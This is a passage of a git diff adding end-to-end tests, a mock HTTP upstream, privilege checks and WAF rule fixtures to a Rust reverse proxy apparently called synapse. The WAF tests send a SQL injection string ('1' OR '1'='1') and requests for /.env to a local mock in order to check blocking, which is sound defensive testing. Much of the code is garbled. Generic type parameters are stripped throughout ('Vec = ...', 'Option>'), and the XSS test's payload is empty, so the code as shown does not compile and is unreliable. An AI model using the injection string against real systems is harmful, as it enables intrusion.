.get(format!("http://{}/api/cors", upstream.address())) + .header("Origin", "https://example.com") + .send() + .await + .unwrap(); + + let headers = resp.headers(); + assert_eq!(headers.get("Access-Control-Allow-Origin").unwrap(), "*"); + assert!(headers.get("Access-Control-Allow-Methods").is_some()); + assert!(headers.get("Access-Control-Allow-Headers").is_some()); + + upstream.stop().await; +} + +/// Test rate limit headers in response +#[tokio::test] +async fn test_rate_limit_response_headers() { + let upstream = MockUpstream::start().await; + + upstream + .register_with_headers( + "GET", + "/api/limited", + 200, + "OK", + vec![ + ("X-RateLimit-Limit", "100"), + ("X-RateLimit-Remaining", "99"), + ("X-RateLimit-Reset", "1704067200"), + ("Retry-After", "60"), + ], + ) + .await; + + let client = reqwest::Client::new(); + let resp = client + .get(format!("http://{}/api/limited", upstream.address())) + .send() + .await + .unwrap(); + + let headers = resp.headers(); + assert_eq!(headers.get("X-RateLimit-Limit").unwrap(), "100"); + assert_eq!(headers.get("X-RateLimit-Remaining").unwrap(), "99"); + assert!(headers.get("X-RateLimit-Reset").is_some()); + assert_eq!(headers.get("Retry-After").unwrap(), "60"); + + upstream.stop().await; +} + +/// Test request with Host header +#[tokio::test] +async fn test_host_header() { + let upstream = MockUpstream::start().await; + upstream.register("GET", "/", 200, "OK").await; + + let client = reqwest::Client::new(); + + // Test with explicit Host header + let resp = client + .get(format!("http://{}/", upstream.address())) + .header("Host", "example.com") + .send() + .await + .unwrap(); + assert_eq!(resp.status(), 200); + + // Test with subdomain + let resp = client + .get(format!("http://{}/", upstream.address())) + .header("Host", "api.example.com") + .send() + .await + .unwrap(); + assert_eq!(resp.status(), 200); + + upstream.stop().await; +} + +/// Test cookie headers +#[tokio::test] +async fn test_cookie_headers() { + let upstream = MockUpstream::start().await; + + upstream + .register_with_headers( + "GET", + "/login", + 200, + "logged in", + vec![( + "Set-Cookie", + "session=abc123; HttpOnly; Secure; SameSite=Strict", + )], + ) + .await; + + let client = reqwest::Client::new(); + + // Get response with Set-Cookie + let resp = client + .get(format!("http://{}/login", upstream.address())) + .send() + .await + .unwrap(); + + assert!(resp.headers().get("Set-Cookie").is_some()); + let cookie = resp.headers().get("Set-Cookie").unwrap().to_str().unwrap(); + assert!(cookie.contains("session=abc123")); + assert!(cookie.contains("HttpOnly")); + + upstream.stop().await; +} + +/// Test request with multiple cookies +#[tokio::test] +async fn test_request_cookies() { + let upstream = MockUpstream::start().await; + upstream + .register("GET", "/dashboard", 200, "dashboard") + .await; + + let client = reqwest::Client::new(); + let resp = client + .get(format!("http://{}/dashboard", upstream.address())) + .header("Cookie", "session=abc123; user=john; theme=dark") + .send() + .await + .unwrap(); + + assert_eq!(resp.status(), 200); + + upstream.stop().await; +} diff --git a/tests/e2e/waf_test.rs b/tests/e2e/waf_test.rs new file mode 100644 index 0000000..d3ca3d1 --- /dev/null +++ b/tests/e2e/waf_test.rs @@ -0,0 +1,258 @@ +//! WAF E2E tests +//! +//! These tests verify WAF functionality through the mock upstream. +//! True E2E tests require running the actual proxy binary. +//! +//! Unit tests for WAF modules are in src/security/waf/actions/*.rs + +use crate::helpers::MockUpstream; + +/// Test that mock upstream returns correct responses +/// This is a foundation test for WAF E2E testing +#[tokio::test] +async fn test_mock_upstream_for_waf_testing() { + let upstream = MockUpstream::start().await; + + // Register various responses for WAF testing scenarios + upstream + .register("GET", "/api/public", 200, r#"{"status":"ok"}"#) + .await; + upstream + .register("GET", "/admin/secret", 200, r#"{"admin":true}"#) + .await; + upstream + .register("POST", "/api/upload", 201, r#"{"uploaded":true}"#) + .await; + + let client = reqwest::Client::new(); + + // Test public endpoint + let resp = client + .get(format!("http://{}/api/public", upstream.address())) + .send() + .await + .unwrap(); + assert_eq!(resp.status(), 200); + + // Test admin endpoint (would be blocked by WAF in real scenario) + let resp = client + .get(format!("http://{}/admin/secret", upstream.address())) + .send() + .await + .unwrap(); + assert_eq!(resp.status(), 200); + + upstream.stop().await; +} + +/// Test request with various user agents +/// In a real WAF test, certain user agents would be blocked +#[tokio::test] +async fn test_user_agent_scenarios() { + let upstream = MockUpstream::start().await; + upstream.register("GET", "/", 200, "OK").await; + + let client = reqwest::Client::new(); + let url = format!("http://{}/", upstream.address()); + + // Normal browser user agent + let resp = client + .get(&url) + .header("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64)") + .send() + .await + .unwrap(); + assert_eq!(resp.status(), 200); + + // Bot user agent (would be blocked by WAF) + let resp = client + .get(&url) + .header("User-Agent", "BadBot/1.0") + .send() + .await + .unwrap(); + // Without WAF, this still succeeds + assert_eq!(resp.status(), 200); + + upstream.stop().await; +} + +/// Test rate limiting scenario +/// Without actual WAF, we just verify the mock handles concurrent requests +#[tokio::test] +async fn test_rate_limit_scenario() { + let upstream = MockUpstream::start().await; + upstream.register("GET", "/api/limited", 200, "OK").await; + + let client = reqwest::Client::new(); + let url = format!("http://{}/api/limited", upstream.address()); + + // Make 10 rapid requests + let mut handles = vec![]; + for _ in 0..10 { + let client = client.clone(); + let url = url.clone(); + handles.push(tokio::spawn(async move { + client.get(&url).send().await.unwrap().status().as_u16() + })); + } + + let results: Vec = futures::future::join_all(handles) + .await + .into_iter() + .map(|r| r.unwrap()) + .collect(); + + // Without WAF rate limiting, all should succeed + assert!(results.iter().all(|&s| s == 200)); + + upstream.stop().await; +} + +/// Test large request body scenario +/// WAF might block requests with bodies exceeding a certain size +#[tokio::test] +async fn test_large_body_scenario() { + let upstream = MockUpstream::start().await; + upstream.register("POST", "/api/upload", 200, "OK").await; + + let client = reqwest::Client::new(); + let url = format!("http://{}/api/upload", upstream.address()); + + // Normal sized body + let resp = client.post(&url).body("small data").send().await.unwrap(); + assert_eq!(resp.status(), 200); + + // Medium body (100KB) - should succeed + let medium_body = "x".repeat(100 * 1024); + let resp = client.post(&url).body(medium_body).send().await.unwrap(); + assert_eq!(resp.status(), 200); + + // Note: Very large bodies (1MB+) may fail due to server limits + // In a real WAF test, this would be blocked by content-length rules + + upstream.stop().await; +} + +/// Test path-based blocking scenario +#[tokio::test] +async fn test_path_blocking_scenario() { + let upstream = MockUpstream::start().await; + upstream.register("GET", "/public", 200, "public").await; + upstream.register("GET", "/admin", 200, "admin").await; + upstream.register("GET", "/admin/users", 200, "users").await; + upstream.register("GET", "/.env", 200, "secrets").await; + + let client = reqwest::Client::new(); + let base = format!("http://{}", upstream.address()); + + // Public path - should always be accessible + let resp = client.get(format!("{}/public", base)).send().await.unwrap(); + assert_eq!(resp.status(), 200); + + // Admin paths - WAF might block these + let resp = client.get(format!("{}/admin", base)).send().await.unwrap(); + assert_eq!(resp.status(), 200); // Without WAF + + // Sensitive files - WAF should block these + let resp = client.get(format!("{}/.env", base)).send().await.unwrap(); + assert_eq!(resp.status(), 200); // Without WAF + + upstream.stop().await; +} + +/// Test SQL injection patterns in query string +#[tokio::test] +async fn test_sql_injection_scenario() { + let upstream = MockUpstream::start().await; + upstream + .register("GET", "/api/search", 200, "results") + .await; + + let client = reqwest::Client::new(); + let base = format!("http://{}/api/search", upstream.address()); + + // Normal query + let resp = client + .get(format!("{}?q=hello", base)) + .send() + .await + .unwrap(); + assert_eq!(resp.status(), 200); + + // SQL injection attempt - WAF should block this + let resp = client + .get(format!("{}?q=1' OR '1'='1", base)) + .send() + .await + .unwrap(); + // Without WAF, this succeeds (the upstream just sees a query param) + assert_eq!(resp.status(), 200); + + upstream.stop().await; +} + +/// Test XSS patterns in request body +#[tokio::test] +async fn test_xss_scenario() { + let upstream = MockUpstream::start().await; + upstream + .register("POST", "/api/comment", 200, "created") + .await; + + let client = reqwest::Client::new(); + let url = format!("http://{}/api/comment", upstream.address()); + + // Normal comment + let resp = client + .post(&url) + .body(r#"{"comment": "Hello world"}"#) + .header("Content-Type", "application/json") + .send() + .await + .unwrap(); + assert_eq!(resp.status(), 200); + + // XSS attempt - WAF should block this + let resp = client + .post(&url) + .body(r#"{"comment": ""}"#) + .header("Content-Type", "application/json") + .send() + .await + .unwrap(); + // Without WAF, this succeeds + assert_eq!(resp.status(), 200); + + upstream.stop().await; +} + +/// Test header-based blocking +#[tokio::test] +async fn test_header_blocking_scenario() { + let upstream = MockUpstream::start().await; + upstream.register("GET", "/", 200, "OK").await; + + let client = reqwest::Client::new(); + let url = format!("http://{}/", upstream.address()); + + // Normal headers + let resp = client + .get(&url) + .header("Accept", "text/html") + .send() + .await + .unwrap(); + assert_eq!(resp.status(), 200); + + // Suspicious headers - WAF might block + let resp = client + .get(&url) + .header("X-Forwarded-For", "127.0.0.1, 10.0.0.1, 192.168.1.1") + .send() + .await + .unwrap(); + assert_eq!(resp.status(), 200); + + upstream.stop().await; +} diff --git a/tests/e2e_test.rs b/tests/e2e_test.rs new file mode 100644 index 0000000..7f19bdf --- /dev/null +++ b/tests/e2e_test.rs @@ -0,0 +1,38 @@ +//! End-to-end tests for synapse +//! +//! This test binary contains E2E tests for: +//! - HTTP/TLS proxy functionality +//! - WAF rule evaluation +//! - nftables/iptables firewall +//! - eBPF/XDP packet filtering +//! +//! # Running Tests +//! +//! Run all unprivileged tests: +//! ```sh +//! cargo test --test e2e_test +//! ``` +//! +//! Run privileged tests (firewall/BPF): +//! ```sh +//! sudo cargo test --test e2e_test -- --ignored +//! ``` +//! +//! Run all tests with root: +//! ```sh +//! sudo cargo test --test e2e_test +//! ``` + +// Test helper modules +mod helpers; + +// E2E test modules +mod e2e { + pub mod bpf_test; + pub mod firewall_test; + pub mod proxy_test; + pub mod waf_test; +} + +// Re-export helpers for use in submodules +pub use helpers::*; diff --git a/tests/fixtures/test_config.yaml b/tests/fixtures/test_config.yaml new file mode 100644 index 0000000..b651c30 --- /dev/null +++ b/tests/fixtures/test_config.yaml @@ -0,0 +1,19 @@ +# Minimal test configuration for E2E tests +mode: "proxy" +multi_thread: false + +network: + iface: "lo" + ip_version: "ipv4" + +firewall: + mode: "none" + +proxy: + address_http: "127.0.0.1:0" + upstream: + conf: "tests/fixtures/test_upstreams.yaml" + +logging: + level: "error" + file_logging_enabled: false diff --git a/tests/fixtures/test_upstreams.yaml b/tests/fixtures/test_upstreams.yaml new file mode 100644 index 0000000..5f9ba26 --- /dev/null +++ b/tests/fixtures/test_upstreams.yaml @@ -0,0 +1,22 @@ +# Test upstream configuration +upstreams: + - host: "test.example.com" + addresses: + - "127.0.0.1:9999" + healthcheck: + enabled: false + + - host: "api.example.com" + addresses: + - "127.0.0.1:9998" + healthcheck: + enabled: false + + - host: "loadbalanced.example.com" + addresses: + - "127.0.0.1:9997" + - "127.0.0.1:9996" + healthcheck: + enabled: false + load_balancing: + method: "round_robin" diff --git a/tests/fixtures/test_waf_rules.yaml b/tests/fixtures/test_waf_rules.yaml new file mode 100644 index 0000000..3f6bf12 --- /dev/null +++ b/tests/fixtures/test_waf_rules.yaml @@ -0,0 +1,64 @@ +# Test WAF rules for E2E testing +waf_rules: + rules: + # Block by user agent + - id: "test-block-badbot" + name: "Block Bad Bot" + org_id: "test" + description: "Block requests with BadBot user agent" + expression: 'http.request.user_agent contains "BadBot"' + action: "block" + + # Block by path + - id: "test-block-admin" + name: "Block Admin Path" + org_id: "test" + description: "Block access to /admin paths" + expression: 'http.request.path starts_with "/admin"' + action: "block" + + # Rate limit all requests + - id: "test-ratelimit" + name: "Rate Limit All" + org_id: "test" + description: "Rate limit all requests" + expression: "true" + action: "ratelimit" + config: + rateLimit: + period: "1" + duration: "60" + requests: "10" + + # Allow specific IP + - id: "test-allow-localhost" + name: "Allow Localhost" + org_id: "test" + description: "Allow requests from localhost" + expression: 'ip.src == 127.0.0.1' + action: "allow" + + # Block by country (for testing with mock GeoIP) + - id: "test-block-country" + name: "Block Country XX" + org_id: "test" + description: "Block requests from country XX" + expression: 'ip.src.country == "XX"' + action: "block" + + # Complex expression test + - id: "test-complex-expression" + name: "Complex Rule" + org_id: "test" + description: "Complex wirefilter expression" + expression: '(http.request.method == "POST" and http.request.path starts_with "/api") and http.request.content_length > 1000000' + action: "block" + +access_rules: + block: + ips: [] + country: [] + asn: [] + allow: + ips: + - "127.0.0.1/32" diff --git a/tests/helpers/mock_upstream.rs b/tests/helpers/mock_upstream.rs new file mode 100644 index 0000000..e971258 --- /dev/null +++ b/tests/helpers/mock_upstream.rs @@ -0,0 +1,202 @@ +//! Mock HTTP upstream server for testing + +use std::collections::HashMap; +use std::net::SocketAddr; +use std::sync::Arc; +use tokio::sync::RwLock; + +use axum::{ + Router, + body::Body, + extract::State, + http::{Request, StatusCode}, + response::Response, + routing::any, +}; +use tokio::net::TcpListener; + +/// A mock HTTP server that can be configured with expected responses +pub struct MockUpstream { + addr: SocketAddr, + shutdown_tx: Option>, + routes: Arc>>, +} + +#[derive(Clone)] +struct MockResponse { + status: StatusCode, + body: String, + headers: Vec<(String, String)>, +} + +#[derive(Clone)] +struct AppState { + routes: Arc>>, + default_response: MockResponse, +} + +impl MockUpstream { + /// Start a new mock upstream server on a random port + pub async fn start() -> Self { + let routes: Arc>> = + Arc::new(RwLock::new(HashMap::new())); + + let state = AppState { + routes: routes.clone(), + default_response: MockResponse { + status: StatusCode::OK, + body: r#"{"status":"ok"}"#.to_string(), + headers: vec![("Content-Type".to_string(), "application/json".to_string())], + }, + }; + + let app = Router::new() + .route("/{*path}", any(handle_request)) + .route("/", any(handle_request)) + .with_state(state); + + let listener = TcpListener::bind("127.0.0.1:0").await.unwrap(); + let addr = listener.local_addr().unwrap(); + + let (shutdown_tx, shutdown_rx) = tokio::sync::oneshot::channel::<()>(); + + tokio::spawn(async move { + axum::serve(listener, app) + .with_graceful_shutdown(async { + let _ = shutdown_rx.await; + }) + .await + .unwrap(); + }); + + // Give the server a moment to start + tokio::time::sleep(tokio::time::Duration::from_millis(10)).await; + + Self { + addr, + shutdown_tx: Some(shutdown_tx), + routes, + } + } + + /// Get the address of the mock server + pub fn address(&self) -> SocketAddr { + self.addr + } + + /// Get the address as a string (host:port) + pub fn address_string(&self) -> String { + self.addr.to_string() + } + + /// Register a route with an expected response + pub async fn register(&self, method: &str, path: &str, status: u16, body: &str) { + self.register_with_headers(method, path, status, body, vec![]) + .await; + } + + /// Register a route with custom headers + pub async fn register_with_headers( + &self, + method: &str, + path: &str, + status: u16, + body: &str, + headers: Vec<(&str, &str)>, + ) { + let key = (method.to_uppercase(), path.to_string()); + let response = MockResponse { + status: StatusCode::from_u16(status).unwrap_or(StatusCode::OK), + body: body.to_string(), + headers: headers + .into_iter() + .map(|(k, v)| (k.to_string(), v.to_string())) + .collect(), + }; + self.routes.write().await.insert(key, response); + } + + /// Stop the mock server + pub async fn stop(mut self) { + if let Some(tx) = self.shutdown_tx.take() { + let _ = tx.send(()); + } + } +} + +async fn handle_request(State(state): State, request: Request) -> Response { + let method = request.method().to_string(); + let path = request.uri().path().to_string(); + + let routes = state.routes.read().await; + let response = routes + .get(&(method.clone(), path.clone())) + .cloned() + .unwrap_or_else(|| state.default_response.clone()); + + let mut builder = Response::builder().status(response.status); + + for (key, value) in &response.headers { + builder = builder.header(key, value); + } + + builder.body(Body::from(response.body)).unwrap() +} + +impl Drop for MockUpstream { + fn drop(&mut self) { + if let Some(tx) = self.shutdown_tx.take() { + let _ = tx.send(()); + } + } +} + +#[cfg(test)] +mod tests { + use super::*; + + #[tokio::test] + async fn test_mock_upstream_start_stop() { + let upstream = MockUpstream::start().await; + let addr = upstream.address(); + assert!(addr.port() > 0); + upstream.stop().await; + } + + #[tokio::test] + async fn test_mock_upstream_register_route() { + let upstream = MockUpstream::start().await; + upstream.register("GET", "/test", 200, "hello").await; + + let client = reqwest::Client::new(); + let resp = client + .get(format!("http://{}/test", upstream.address())) + .send() + .await + .unwrap(); + + assert_eq!(resp.status(), 200); + assert_eq!(resp.text().await.unwrap(), "hello"); + + upstream.stop().await; + } + + #[tokio::test] + async fn test_mock_upstream_custom_status() { + let upstream = MockUpstream::start().await; + upstream + .register("POST", "/error", 500, "server error") + .await; + + let client = reqwest::Client::new(); + let resp = client + .post(format!("http://{}/error", upstream.address())) + .send() + .await + .unwrap(); + + assert_eq!(resp.status(), 500); + + upstream.stop().await; + } +} diff --git a/tests/helpers/mod.rs b/tests/helpers/mod.rs new file mode 100644 index 0000000..b7e3d7f --- /dev/null +++ b/tests/helpers/mod.rs @@ -0,0 +1,9 @@ +//! Test helper utilities for E2E tests + +pub mod mock_upstream; +pub mod privileges; +pub mod test_proxy; + +pub use mock_upstream::MockUpstream; +pub use privileges::is_root; +pub use test_proxy::{TestConfig, TestProxy}; diff --git a/tests/helpers/privileges.rs b/tests/helpers/privileges.rs new file mode 100644 index 0000000..65f7ec1 --- /dev/null +++ b/tests/helpers/privileges.rs @@ -0,0 +1,109 @@ +//! Privilege and capability checking utilities for tests + +use std::fs; +use std::path::Path; +use std::process::Command; + +/// Check if running as root (UID 0) +pub fn is_root() -> bool { + #[cfg(unix)] + { + // Use id command to check if we're root + Command::new("id") + .arg("-u") + .output() + .map(|o| String::from_utf8_lossy(&o.stdout).trim() == "0") + .unwrap_or(false) + } + #[cfg(not(unix))] + { + false + } +} + +/// Check if CAP_NET_ADMIN capability is available +pub fn has_cap_net_admin() -> bool { + // On Linux, try to check /proc/self/status for capabilities + #[cfg(target_os = "linux")] + { + if let Ok(status) = fs::read_to_string("/proc/self/status") { + for line in status.lines() { + if line.starts_with("CapEff:") { + // CAP_NET_ADMIN is bit 12 (0x1000) + if let Some(hex) = line.split_whitespace().nth(1) { + if let Ok(caps) = u64::from_str_radix(hex, 16) { + return (caps & (1 << 12)) != 0; + } + } + } + } + } + is_root() // Fall back to root check + } + #[cfg(not(target_os = "linux"))] + { + is_root() + } +} + +/// Check if BPF is available on this system +pub fn is_bpf_available() -> bool { + #[cfg(target_os = "linux")] + { + // Check for BTF support (required for CO-RE) + let btf_exists = Path::new("/sys/kernel/btf/vmlinux").exists(); + // Check for BPF syscall support + let bpf_enabled = Path::new("/sys/fs/bpf").exists(); + btf_exists && bpf_enabled && is_root() + } + #[cfg(not(target_os = "linux"))] + { + false + } +} + +/// Macro to skip test if not running as root +#[macro_export] +macro_rules! skip_if_unprivileged { + () => { + if !$crate::helpers::privileges::is_root() { + eprintln!("Skipping test: requires root privileges"); + return; + } + }; +} + +/// Macro to skip test if BPF is not available +#[macro_export] +macro_rules! skip_if_no_bpf { + () => { + if !$crate::helpers::privileges::is_bpf_available() { + eprintln!("Skipping test: BPF not available (requires root + kernel support)"); + return; + } + }; +} + +// Re-export macros at module level +pub use skip_if_no_bpf; +pub use skip_if_unprivileged; + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn test_is_root_returns_bool() { + let _ = is_root(); + } + + #[test] + fn test_has_cap_net_admin_returns_bool() { + let _ = has_cap_net_admin(); + } + + #[test] + fn test_is_bpf_available_returns_bool() { + let _ = is_bpf_available(); + } +} diff --git a/tests/helpers/test_proxy.rs b/tests/helpers/test_proxy.rs new file mode 100644 index 0000000..b729a70 --- /dev/null +++ b/tests/helpers/test_proxy.rs @@ -0,0 +1,239 @@ +//! Test proxy spawning and management utilities + +use std::net::SocketAddr; +use std::path::PathBuf; +use std::process::{Child, Command, Stdio}; +use std::time::Duration; + +/// Configuration for starting a test proxy +#[derive(Debug, Clone)] +pub struct TestConfig { + /// HTTP listen port (0 for random) + pub http_port: u16, + /// Upstream server address + pub upstream_address: Option, + /// WAF rules to apply + pub waf_rules: Vec, + /// Firewall mode + pub firewall_mode: String, + /// Config file path (if using file-based config) + pub config_file: Option, + /// Log level + pub log_level: String, +} + +#[derive(Debug, Clone)] +pub struct WafRuleConfig { + pub id: String, + pub name: String, + pub expression: String, + pub action: String, + pub config: Option, +} + +impl Default for TestConfig { + fn default() -> Self { + Self { + http_port: 0, + upstream_address: None, + waf_rules: vec![], + firewall_mode: "none".to_string(), + config_file: None, + log_level: "error".to_string(), + } + } +} + +/// A running test proxy instance +pub struct TestProxy { + process: Option, + http_address: SocketAddr, + config: TestConfig, +} + +impl TestProxy { + /// Start a new test proxy with the given configuration + pub async fn start(config: TestConfig) -> Result> { + // Find a free port if not specified + let http_port = if config.http_port == 0 { + find_free_port().await? + } else { + config.http_port + }; + + let http_address = SocketAddr::from(([127, 0, 0, 1], http_port)); + + // Build command line arguments + let mut args = vec![ + "--mode".to_string(), + "proxy".to_string(), + "--proxy-address-http".to_string(), + format!("127.0.0.1:{}", http_port), + "--firewall-mode".to_string(), + config.firewall_mode.clone(), + "--log-level".to_string(), + config.log_level.clone(), + ]; + + if let Some(upstream) = &config.upstream_address { + args.push("--upstream-address".to_string()); + args.push(upstream.to_string()); + } + + if let Some(config_file) = &config.config_file { + args.push("--config".to_string()); + args.push(config_file.to_string_lossy().to_string()); + } + + // Find the binary + let binary = find_synapse_binary()?; + + // Start the proxy process + let process = Command::new(&binary) + .args(&args) + .stdout(Stdio::null()) + .stderr(Stdio::null()) + .spawn()?; + + // Wait for the proxy to start + wait_for_port(http_port, Duration::from_secs(5)).await?; + + Ok(Self { + process: Some(process), + http_address, + config, + }) + } + + /// Get the HTTP address of the proxy + pub fn address(&self) -> SocketAddr { + self.http_address + } + + /// Get the HTTP address as a string + pub fn address_string(&self) -> String { + self.http_address.to_string() + } + + /// Get a reqwest client configured to use this proxy + pub fn client(&self) -> reqwest::Client { + reqwest::Client::builder() + .timeout(Duration::from_secs(30)) + .build() + .unwrap() + } + + /// Stop the proxy gracefully + pub async fn stop(mut self) { + if let Some(mut process) = self.process.take() { + // Send SIGTERM for graceful shutdown using kill command + #[cfg(unix)] + { + let _ = std::process::Command::new("kill") + .arg("-TERM") + .arg(process.id().to_string()) + .status(); + } + + // Wait a bit for graceful shutdown + tokio::time::sleep(Duration::from_millis(100)).await; + + // Force kill if still running + let _ = process.kill(); + let _ = process.wait(); + } + } + + /// Get the test configuration + pub fn config(&self) -> &TestConfig { + &self.config + } +} + +impl Drop for TestProxy { + fn drop(&mut self) { + if let Some(mut process) = self.process.take() { + let _ = process.kill(); + let _ = process.wait(); + } + } +} + +/// Find a free TCP port +async fn find_free_port() -> Result> { + let listener = tokio::net::TcpListener::bind("127.0.0.1:0").await?; + let port = listener.local_addr()?.port(); + drop(listener); + Ok(port) +} + +/// Wait for a port to become available +async fn wait_for_port(port: u16, timeout: Duration) -> Result<(), Box> { + let start = std::time::Instant::now(); + while start.elapsed() < timeout { + if tokio::net::TcpStream::connect(format!("127.0.0.1:{}", port)) + .await + .is_ok() + { + return Ok(()); + } + tokio::time::sleep(Duration::from_millis(50)).await; + } + Err(format!( + "Port {} did not become available within {:?}", + port, timeout + ) + .into()) +} + +/// Find the synapse binary +fn find_synapse_binary() -> Result> { + // Try common locations + let candidates = [ + PathBuf::from("target/debug/synapse"), + PathBuf::from("target/release/synapse"), + PathBuf::from("./synapse"), + ]; + + for path in &candidates { + if path.exists() { + return Ok(path.clone()); + } + } + + // Try to find via cargo + let output = Command::new("cargo") + .args(["metadata", "--format-version", "1"]) + .output()?; + + if output.status.success() { + let metadata: serde_json::Value = serde_json::from_slice(&output.stdout)?; + if let Some(target_dir) = metadata.get("target_directory").and_then(|v| v.as_str()) { + let debug_path = PathBuf::from(target_dir).join("debug/synapse"); + if debug_path.exists() { + return Ok(debug_path); + } + } + } + + Err("Could not find synapse binary. Run 'cargo build' first.".into()) +} + +#[cfg(test)] +mod tests { + use super::*; + + #[tokio::test] + async fn test_find_free_port() { + let port = find_free_port().await.unwrap(); + assert!(port > 0); + } + + #[test] + fn test_default_config() { + let config = TestConfig::default(); + assert_eq!(config.http_port, 0); + assert_eq!(config.firewall_mode, "none"); + assert!(config.waf_rules.is_empty()); + } +} diff --git a/tests/integration_multicore_test.rs b/tests/integration_multicore_test.rs index d860893..3eb558b 100644 --- a/tests/integration_multicore_test.rs +++ b/tests/integration_multicore_test.rs @@ -120,14 +120,20 @@ async fn test_high_concurrency_scenario() { } let elapsed = start.elapsed(); - println!("{} concurrent tasks completed in {:?}", concurrent_requests, elapsed); + println!( + "{} concurrent tasks completed in {:?}", + concurrent_requests, elapsed + ); assert_eq!(results.len(), concurrent_requests); // With 4 workers, 100 tasks with 10ms each should complete much faster than sequential // Sequential would be 1000ms, concurrent should be around 250-300ms with 4 workers - assert!(elapsed < Duration::from_millis(600), - "Concurrent execution took too long: {:?}. May not be utilizing all cores.", elapsed); + assert!( + elapsed < Duration::from_millis(600), + "Concurrent execution took too long: {:?}. May not be utilizing all cores.", + elapsed + ); } #[tokio::test(flavor = "multi_thread", worker_threads = 8)] @@ -203,9 +209,7 @@ fn test_environment_variable_override() { assert!(runtime.is_ok()); let runtime = runtime.unwrap(); - let result = runtime.block_on(async { - "success" - }); + let result = runtime.block_on(async { "success" }); assert_eq!(result, "success"); diff --git a/tests/multicore_benchmark.rs b/tests/multicore_benchmark.rs index 65ef7f6..079ba9c 100644 --- a/tests/multicore_benchmark.rs +++ b/tests/multicore_benchmark.rs @@ -21,7 +21,10 @@ async fn benchmark_single_threaded() { } let elapsed = start.elapsed(); - println!("Single-threaded runtime: 100 tasks completed in {:?}", elapsed); + println!( + "Single-threaded runtime: 100 tasks completed in {:?}", + elapsed + ); println!("Average per task: {:?}", elapsed / 100); } @@ -65,7 +68,10 @@ async fn benchmark_four_threads() { } let elapsed = start.elapsed(); - println!("Four-threaded runtime: 100 tasks completed in {:?}", elapsed); + println!( + "Four-threaded runtime: 100 tasks completed in {:?}", + elapsed + ); println!("Average per task: {:?}", elapsed / 100); } @@ -87,7 +93,10 @@ async fn benchmark_eight_threads() { } let elapsed = start.elapsed(); - println!("Eight-threaded runtime: 100 tasks completed in {:?}", elapsed); + println!( + "Eight-threaded runtime: 100 tasks completed in {:?}", + elapsed + ); println!("Average per task: {:?}", elapsed / 100); } @@ -103,7 +112,10 @@ fn benchmark_cpu_intensive_single_thread() { } let elapsed = start.elapsed(); - println!("Single-threaded CPU work: 8 tasks completed in {:?}", elapsed); + println!( + "Single-threaded CPU work: 8 tasks completed in {:?}", + elapsed + ); } #[tokio::test(flavor = "multi_thread", worker_threads = 8)] @@ -127,7 +139,10 @@ async fn benchmark_cpu_intensive_multi_thread() { } let elapsed = start.elapsed(); - println!("Multi-threaded CPU work: 8 tasks completed in {:?}", elapsed); + println!( + "Multi-threaded CPU work: 8 tasks completed in {:?}", + elapsed + ); } #[tokio::test(flavor = "multi_thread", worker_threads = 4)] @@ -149,7 +164,9 @@ async fn benchmark_realistic_proxy_workload() { sum = sum.wrapping_add(i * j); } sum - }).await.unwrap(); + }) + .await + .unwrap(); // Simulate upstream request tokio::time::sleep(Duration::from_millis(5)).await; @@ -168,7 +185,10 @@ async fn benchmark_realistic_proxy_workload() { let elapsed = start.elapsed(); let rps = 50.0 / elapsed.as_secs_f64(); - println!("Realistic proxy workload: 50 requests completed in {:?}", elapsed); + println!( + "Realistic proxy workload: 50 requests completed in {:?}", + elapsed + ); println!("Throughput: {:.2} requests/second", rps); } @@ -193,7 +213,10 @@ async fn benchmark_high_throughput() { let elapsed = start.elapsed(); let rps = num_requests as f64 / elapsed.as_secs_f64(); - println!("High throughput test: {} requests completed in {:?}", num_requests, elapsed); + println!( + "High throughput test: {} requests completed in {:?}", + num_requests, elapsed + ); println!("Throughput: {:.2} requests/second", rps); } @@ -231,6 +254,8 @@ async fn benchmark_memory_allocation_concurrent() { let elapsed = start.elapsed(); let total_kb = total_allocated.load(Ordering::SeqCst) / 1024; - println!("Memory allocation benchmark: {}KB allocated across 100 concurrent tasks in {:?}", - total_kb, elapsed); + println!( + "Memory allocation benchmark: {}KB allocated across 100 concurrent tasks in {:?}", + total_kb, elapsed + ); } diff --git a/tests/multicore_test.rs b/tests/multicore_test.rs index c6251dc..00bb74b 100644 --- a/tests/multicore_test.rs +++ b/tests/multicore_test.rs @@ -29,7 +29,11 @@ async fn test_multiple_workers_are_used() { // Verify that more than one thread was used let unique_threads = thread_ids.lock().unwrap().len(); println!("Tasks executed on {} different threads", unique_threads); - assert!(unique_threads > 1, "Expected tasks to run on multiple threads, but only {} thread(s) were used", unique_threads); + assert!( + unique_threads > 1, + "Expected tasks to run on multiple threads, but only {} thread(s) were used", + unique_threads + ); } #[tokio::test(flavor = "multi_thread", worker_threads = 4)] @@ -58,8 +62,11 @@ async fn test_concurrent_task_execution() { // If tasks run concurrently, they should complete in roughly 100ms // Allow some overhead but verify it's not sequential - assert!(elapsed < Duration::from_millis(250), - "Expected concurrent execution (~100ms), but took {:?}. Tasks may be running sequentially.", elapsed); + assert!( + elapsed < Duration::from_millis(250), + "Expected concurrent execution (~100ms), but took {:?}. Tasks may be running sequentially.", + elapsed + ); } #[tokio::test(flavor = "multi_thread", worker_threads = 8)] @@ -92,15 +99,20 @@ async fn test_cpu_intensive_tasks_on_multiple_cores() { } let unique_threads = thread_ids.lock().unwrap().len(); - println!("CPU-intensive tasks executed on {} different blocking threads", unique_threads); + println!( + "CPU-intensive tasks executed on {} different blocking threads", + unique_threads + ); // Verify all tasks completed assert_eq!(results.len(), 8, "All 8 tasks should complete"); // Verify multiple threads were used for blocking tasks - assert!(unique_threads > 1, + assert!( + unique_threads > 1, "Expected CPU-intensive tasks to run on multiple threads, but only {} thread(s) were used", - unique_threads); + unique_threads + ); } #[test] @@ -138,7 +150,7 @@ async fn test_parallel_work_distribution() { max, current, Ordering::SeqCst, - Ordering::SeqCst + Ordering::SeqCst, ) { Ok(_) => break, Err(new_max) => max = new_max, @@ -162,9 +174,11 @@ async fn test_parallel_work_distribution() { println!("Maximum concurrent tasks: {}", max_concurrent_tasks); // Verify that at least 2 tasks ran concurrently - assert!(max_concurrent_tasks >= 2, + assert!( + max_concurrent_tasks >= 2, "Expected at least 2 tasks to run concurrently, but only {} were concurrent", - max_concurrent_tasks); + max_concurrent_tasks + ); } #[tokio::test(flavor = "multi_thread", worker_threads = 4)] @@ -195,11 +209,16 @@ async fn 